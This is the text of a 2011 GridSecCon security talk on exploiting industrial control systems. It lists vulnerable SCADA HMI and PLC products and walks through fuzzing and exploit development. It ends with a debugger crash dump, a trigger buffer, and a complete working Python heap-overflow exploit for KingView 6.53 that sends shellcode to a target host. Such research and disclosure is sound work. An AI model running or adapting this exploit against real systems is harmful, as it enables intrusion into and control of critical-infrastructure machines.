Exploiting Industrial Control Systems GridSecCon 2011

Dillon Beresford NSS Labs [email protected]

ICS Vulnerabilities • KingView SCADA HMI (WellinControl - CHINA) HMI SOFTWARE CVE: 2011-0406

• Sunway ForceControl (Sunway - CHINA) HMI SOFTWARE CNVD-2011-05348 CNVD-2011-05347

• Siemens Simatic S7 PLCs (Siemens - Germany) PLC HARDWARE ICSA-11-223-01

Vulnerability Classifications • • • • • • • •

Stack or Heap Overflows (Low Hanging Fruit) Integer Overflow Memory Corruption Bugs Arbitrary File Upload and Execution Local File Format - Reading Files Remote Client Side - Browser Plugins Protocol Specific Vulnerabilities (Good Stuff!) Backdoors - Yes, there are exploitable backdoors in some products… (SIEMENS)

Finding 0day • Search for downloadable software using Google, Baidu, or purchase the hardware from sellers on eBay. • Setup a stable testing environment with plenty of virtual machines containing various operating systems and service pack levels as exploit offsets tend to change depending on the OS and service pack. • Install software and assess various attack vectors, services and running processes. • Fuzz the application or device and wait for a crash. Then determine if the bug is exploitable or not.

Fuzzing • The best fuzzer is the one you design yourself. • Fuzzers send pseudo random input • Ruby, Python and Perl are useful programming languages for designing custom fuzzers. • Metasploit has a nice variety of fuzzing modules already snapped in the framework. • Analyze target application protocols and dissect packets going to and from the test machine which helps in locating attack vectors. Look for any anomalies and leverage them.

Discovery Process • Attach a debugger to the target process • Send a buffer containing a bunch of junk characters over a TCP or UDP port • Pray for a crash • Write a proof of concept trigger • Further analyze the crash Locate various instructions (opcode) to get us to our evil buffer (shellcode). Most applications contain protections such as Stack Cookies, SafeSeh, DEP and ASLR, so we will need to bypass all of these protections in order to build a working exploit.

Tools of the Trade • Debuggers – IDA, WinDbg or Immunity • Debugger Scripts - !mona !pvefindaddr !jutsu • Packet Capturing – Wireshark • Metasploit - Open Source Exploit Framework Debugger scripts are very helpful as they speed up the amount of time it would normally take to develop a working exploit from a vulnerability. Metasploit is very useful as it offers exploit mixins and various exploit dev tools and it’s also in Ruby!

Debug output from an exploitable bug KingView HistorySvr.exe Vuln: ## (318.6d4): Access violation - code c0000005 (first chance) ## First chance exceptions are reported before any exception handling. ## This exception may be expected and handled. ## eax=42424242 ebx=00000285 ecx=44444444 edx=00d38110 esi=00d38110 edi=003a0000 ## eip=77f6256f esp=0012f36c ebp=0012f584 iopl=0 nv up ei pl zr na pe nc ## cs=001b ss=0023 ds=0023 es=0023 fs=0038 gs=0000 efl=00010246 ## ntdll!RtlAllocateHeapSlowly+0x6bd: ## 77f6256f 8901 mov dword ptr [ecx],eax ds:0023:44444444=???????? ## 0:000> u ## ntdll!RtlAllocateHeapSlowly+0x6bd: ## 77f6256f 8901 mov dword ptr [ecx],eax ## 77f62571 894804 mov dword ptr [eax+4],ecx ## 77f62574 3bc1 cmp eax,ecx ## 77f62576 7534 jne ntdll!RtlAllocateHeapSlowly+0x6fa (77f625ac) ## 77f62578 668b06 mov ax,word ptr [esi] ## 77f6257b 663d8000 cmp ax,80h ## 77f6257f 732b jae ntdll!RtlAllocateHeapSlowly+0x6fa (77f625ac) ## 77f62581 0fb7c8 movzx ecx,ax

We have control over two pointers, one in the EAX register and the other in the ECX register. If we know exactly where we are overwriting the addresses in each register (which we do as clearly indicated by our buffer) 42424242 => B and 44444444 => D we can redirect the vulnerable process to our evil code and pop a shell, thus allowing us full control over the target machine.

A Trigger Buffer from a PoC exploit = ("\x90" * 1024 + "\x44" * 31788) exploit += ("\xeb\x14") # JMP exploit += ("\x44" * 6) (Padding) exploit += ("\xad\xbb\xc3\x77") # ECX 0x77C3BBAD => call dword ptr ds:[EDI+74] exploit += ("\xb4\x73\xed\x77") # EAX 0x77ED73B4 => UnhandledExceptionFilter() exploit += ("\x90" * 21) exploit += shellcode

A Working Exploit import os import socket import sys host = sys.argv[1] port = int(sys.argv[2]) print " KingView 6.53 SCADA HMI Heap Smashing Exploit " print " Credits: D1N | twitter.com/D1N " shellcode = ("\x33\xC0\x50\x68\x63\x61\x6C\x63\x54\x5B\x50\x53\xB9" "\x44\x80\xc2\x77" "\xFF\xD1\x90\x90") exploit = ("\x90" * 1024 + "\x44" * 31788) exploit += ("\xeb\x14") # our JMP (over the junk and into nops) exploit += ("\x44" * 6) exploit += ("\xad\xbb\xc3\x77") # ECX 0x77C3BBAD --> call dword ptr ds:[EDI+74] exploit += ("\xb4\x73\xed\x77") # EAX 0x77ED73B4 --> UnhandledExceptionFilter() exploit += ("\x90" * 21) exploit += shellcode s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((host,port)) s.send(exploit) data = s.recv(1024) print " [+] Closing connection.." s.close() print " [+] Done!” # Executes a command (calc.exe) on the target machine.

Metasploit def exploit sploit = ‘ ‘ sploit